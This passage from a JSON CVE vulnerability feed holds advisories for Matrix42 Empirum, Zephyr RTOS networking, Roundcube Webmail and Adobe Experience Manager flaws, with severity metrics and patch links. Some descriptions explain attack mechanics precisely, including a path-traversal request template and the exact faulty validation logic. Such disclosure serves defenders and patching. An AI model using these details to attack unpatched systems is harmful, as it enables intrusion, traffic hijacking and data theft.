permissions to all authenticated users. A low-privileged local attacker can connect to this pipe and send crafted IPC messages to trigger execution of arbitrary commands with SYSTEM privileges via an untrusted search path. This allows privilege escalation by placing a malicious shadow.exe in a controlled working directory."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-29T20:43:45.504415Z","id":"CVE-2026-57919","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-276"},{"lang":"en","value":"CWE-426"}]}],"references":[{"url":"https://docs.matrix42.com/1041748_vulnerability-list/3862631_cve-2026-57919-privilege-escalation-in-empirum-personal-backup/","source":"cve@mitre.org"},{"url":"https://docs.matrix42.com/en_US/1041748_vulnerability-list/cve-2026-57919-privilege-escalation-in-empirum-personal-backup","source":"cve@mitre.org"},{"url":"https://matrix42.com","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-7656","sourceIdentifier":"vulnerabilities@zephyrproject.org","published":"2026-06-29T23:16:43.650","lastModified":"2026-07-17T16:17:18.483","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"The IPv6 Neighbor Discovery handlers in subsys/net/ip/ipv6_nbr.c (handle_ra_input, handle_ns_input, handle_na_input) used an incorrect boolean expression that combined the RFC 4861 validity checks with the ICMPv6 code check using the wrong operator precedence: the form was '((length/hop/source/target checks) && (icmp_hdr->code != 0))'. Because every legitimate ND message carries ICMPv6 code 0, an attacker setting code == 0 (the normal value) caused the entire predicate to evaluate false, so the packet was never dropped and all of the other checks were silently skipped. The bypassed checks include the mandatory Hop Limit == 255 verification (which proves an ND packet originated on-link and was not forwarded) and, for Router Advertisements, the requirement that the source be a link-local address, as well as multicast-target sanity checks. As a result, an adjacent on-link attacker — and, because the Hop-Limit-255 guard is bypassed, potentially a remote/off-link attacker whose packets would otherwise be rejected — can have forged Router Advertisement, Neighbor Solicitation, and Neighbor Advertisement messages accepted. A forged RA lets the attacker reconfigure the victim's default router, on-link prefixes (SLAAC), MTU, reachable/retransmit timers, and (with CONFIG_NET_IPV6_RA_RDNSS) DNS servers, while forged NS/NA enable neighbor-cache poisoning, enabling man-in-the-middle, traffic redirection, and denial of service. The flaw is an input-validation/authentication weakness rather than a memory-safety issue: the underlying packet-parsing primitives (net_pkt_get_data, net_pkt_read, net_pkt_skip) are independently bounds-safe and the validated 'length' is the true buffer length, so skipping the length check causes no out-of-bounds access. The defect has existed since the logic was introduced in 2018 and shipped in all releases through v4.4.0; it is fixed by splitting the condition so any failing check drops the packet."}],"affected":[{"source":"vulnerabilities@zephyrproject.org","affectedData":[{"vendor":"zephyrproject","product":"zephyr","defaultStatus":"unaffected","collectionURL":"https://github.com/zephyrproject-rtos/zephyr","packageName":"zephyr","programFiles":["subsys/net/ip/ipv6_nbr.c"],"versions":[{"version":"1.14.0","lessThan":"4.5.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.6,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-30T13:10:33.227842Z","id":"CVE-2026-7656","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","description":[{"lang":"en","value":"CWE-290"},{"lang":"en","value":"CWE-670"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:zephyrproject:zephyr:*:*:*:*:*:*:*:*","versionEndIncluding":"4.4.1","matchCriteriaId":"9A947003-969D-455C-8C9D-6AF56EDB9330"}]}]}],"references":[{"url":"https://github.com/zephyrproject-rtos/zephyr/commit/095f064c94b95f9c35e05602e693dc268f0cb865","source":"vulnerabilities@zephyrproject.org","tags":["Patch"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-cpjw-rvwx-ph9f","source":"vulnerabilities@zephyrproject.org","tags":["Exploit","Patch","Vendor Advisory"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-cpjw-rvwx-ph9f","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Patch","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-8023","sourceIdentifier":"vulnerabilities@zephyrproject.org","published":"2026-06-29T23:16:43.777","lastModified":"2026-07-17T16:17:19.503","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Zephyr's HTTP server (subsys/net/lib/http) provides a static-filesystem resource type (HTTP_RESOURCE_TYPE_STATIC_FS, available when CONFIG_FILE_SYSTEM is enabled) that serves files from a configured root directory. Before this fix, both the HTTP/1 and HTTP/2 front-ends placed the raw, attacker-controlled request path into client->url_buffer (assembled in on_url() for HTTP/1 and copied verbatim from the :path pseudo-header for HTTP/2) without resolving ./.. segments. The static-FS handler then built the on-disk filename by directly concatenating the configured root with that raw URL (snprintk(fname, ..., \"%s%s\", static_fs_detail->fs_path, client->url_buffer) at http_server_http1.c:603 and http_server_http2.c:490) and opened it with fs_open(fname, FS_O_READ). Because the handler is reached via wildcard/leading-dir (fnmatch FNM_LEADING_DIR) or fallback resource matching, a request such as GET /<prefix>/../../<file> is dispatched to the handler and, after the underlying filesystem (e.g. LittleFS/FAT) resolves the .. segments, escapes the configured web root, letting an unauthenticated remote client read arbitrary readable files on the mounted volume (information disclosure). The HTTP server requires no TLS or authentication to reach this path. The fix adds http_server_remove_dot_segments(), which canonicalizes the path portion of the URL before resource lookup in both protocol handlers, neutralizing the traversal. Affects releases v4.0.0 through v4.4.0 for deployments that register a static-filesystem resource."}],"affected":[{"source":"vulnerabilities@zephyrproject.org","affectedData":[{"vendor":"zephyrproject","product":"zephyr","defaultStatus":"unaffected","collectionURL":"https://github.com/zephyrproject-rtos/zephyr","packageName":"zephyr","programFiles":["subsys/net/lib/http/headers/server_internal.h","subsys/net/lib/http/http_server_core.c","subsys/net/lib/http/http_server_http1.c","subsys/net/lib/http/http_server_http2.c"],"versions":[{"version":"4.0.0","lessThan":"4.5.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-30T13:11:39.509082Z","id":"CVE-2026-8023","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","description":[{"lang":"en","value":"CWE-22"},{"lang":"en","value":"CWE-23"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:zephyrproject:zephyr:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndIncluding":"4.4.1","matchCriteriaId":"CFE70C6A-CD31-49A0-BAC4-20595278999F"}]}]}],"references":[{"url":"https://github.com/zephyrproject-rtos/zephyr/commit/f4a423c98554f209c5d2f22f041822422c9263b8","source":"vulnerabilities@zephyrproject.org","tags":["Patch"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hch3-53g6-jj3h","source":"vulnerabilities@zephyrproject.org","tags":["Exploit","Patch","Vendor Advisory"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hch3-53g6-jj3h","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Patch","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-10652","sourceIdentifier":"vulnerabilities@zephyrproject.org","published":"2026-06-30T17:16:20.040","lastModified":"2026-07-17T23:16:35.017","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Zephyr's DNS resolver (subsys/net/lib/dns) parses resource records from DNS responses in dns_unpack_answer(), which validated only the fixed RR header (type, class, TTL, rdlength) and accepted any attacker-declared rdlength, including one extending past the end of the received datagram. The TXT and SRV consumers in dns_validate_record() (resolve.c) then read up to rdlength bytes (clamped only to a record-type maximum such as DNS_MAX_TEXT_SIZE, default 64, not to the packet) from the receive buffer via memcpy without their own bounds check, and pass the result to the application's resolve callback. A malicious or spoofed DNS server, an on-path attacker forging UDP DNS replies, or (with mDNS/LLMNR enabled) any LAN node can craft a truncated TXT or SRV response that causes an out-of-bounds read of adjacent receive-pool memory; the disclosed stale bytes (residual contents of prior DNS packets / uninitialized pool memory) are returned to the application as TXT/SRV record contents, an information leak, and may in some configurations cross the allocation boundary and fault, causing a denial of service. The read is bounded (~64 bytes for TXT, ~6 for SRV) and read-only (no write). The fix rejects any record whose declared rdata extends past dns_msg->msg_size at the single chokepoint in dns_unpack_answer(). Affected: v4.3.0 and v4.4.0."}],"affected":[{"source":"vulnerabilities@zephyrproject.org","affectedData":[{"vendor":"zephyrproject","product":"zephyr","defaultStatus":"unaffected","collectionURL":"https://github.com/zephyrproject-rtos/zephyr","packageName":"zephyr","programFiles":["subsys/net/lib/dns/dns_pack.c"],"versions":[{"version":"2.7.0","lessThan":"4.5.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.2,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H","baseScore":7.4,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-30T16:44:24.969113Z","id":"CVE-2026-10652","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"vulnerabilities@zephyrproject.org","type":"Secondary","description":[{"lang":"en","value":"CWE-125"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:zephyrproject:zephyr:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndIncluding":"4.4.1","matchCriteriaId":"AB673835-4CCD-49A7-9873-630B9EE2C814"}]}]}],"references":[{"url":"https://github.com/zephyrproject-rtos/zephyr/commit/58b46c81c6796dac4dc7391f32ba006474f94dc8","source":"vulnerabilities@zephyrproject.org","tags":["Patch"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3jxq-xx8g-q8j2","source":"vulnerabilities@zephyrproject.org","tags":["Exploit","Patch","Vendor Advisory"]},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3jxq-xx8g-q8j2","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Patch","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-54433","sourceIdentifier":"cve@mitre.org","published":"2026-07-14T17:17:05.530","lastModified":"2026-07-17T19:24:24.980","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In Roundcube Webmail before 1.6.17 and 1.7.x before 1.7.2, there is Stored Cross-Site Scripting (XSS) via a crafted plain-text email message. The attacker-controlled JavaScript executes within the victim's authenticated session simply by opening or previewing the message (zero-click)."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"Roundcube","product":"Webmail","defaultStatus":"unaffected","versions":[{"version":"1.6.0","lessThan":"1.6.17","versionType":"semver","status":"affected"},{"version":"1.7.0","lessThan":"1.7.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":5.8}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T14:10:21.104776Z","id":"CVE-2026-54433","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*","versionEndExcluding":"1.6.17","matchCriteriaId":"E15BCA44-7E8E-422F-BBC5-549CF4477061"},{"vulnerable":true,"criteria":"cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*","versionStartIncluding":"1.7.0","versionEndExcluding":"1.7.2","matchCriteriaId":"58061F28-9D4F-4D65-8C64-F77410B6E144"}]}]}],"references":[{"url":"https://roundcube.net/news/2026/07/05/security-updates-1.6.17-and-1.7.2","source":"cve@mitre.org","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48252","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.053","lastModified":"2026-07-17T17:46:06.360","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a Missing Authentication for Critical Function vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T13:21:38.209292Z","id":"CVE-2026-48252","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-306"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48253","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.197","lastModified":"2026-07-17T17:46:02.637","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T13:54:04.102395Z","id":"CVE-2026-48253","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48254","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.320","lastModified":"2026-07-17T17:45:59.040","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T14:06:24.971766Z","id":"CVE-2026-48254","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*","versionEndIncluding":"6.5.25.0","matchCriteriaId":"C8849F58-C7F7-4E39-A3F0-6305BAE9D523"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*","versionEndIncluding":"2020.5.0","matchCriteriaId":"A16BC589-7E8B-4FB8-B6D2-3CC5549D7A06"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*","matchCriteriaId":"852C2582-859F-40DB-96CF-E1274CEECC1F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp1:*:*:lts:*:*:*","matchCriteriaId":"00DDCBAD-1FEF-487F-97BB-481DC02F493A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:experience_manager:6.5:sp2:*:*:lts:*:*:*","matchCriteriaId":"28842AFC-C6CB-4F63-82B6-7B42E291D4E0"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/experience-manager/apsb26-74.html","source":"psirt@adobe.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-48255","sourceIdentifier":"psirt@adobe.com","published":"2026-07-14T20:17:06.443","lastModified":"2026-07-17T17:45:54.900","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed."}],"affected":[{"source":"psirt@adobe.com","affectedData":[{"vendor":"Adobe","product":"Adobe Experience Manager as a Cloud Service","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"2026.5.0","versionType":"custom","status":"affected"},{"version":"2026.6.0","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5 LTS","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"SP2","versionType":"custom","status":"affected"},{"version":"SP2 - Hotfix for NPR-43972","versionType":"custom","status":"unaffected"}]},{"vendor":"Adobe","product":"Adobe Experience Manager 6.5","defaultStatus":"affected","versions":[{"version":"0","lessThanOrEqual":"6.5.25","versionType":"custom","status":"affected"},{"version":"6.5.25 - Hotfix for NPR-43971","versionType":"custom","status":"unaffected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-15T17:40:17.336449Z","id":"CVE-2026-48255","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA 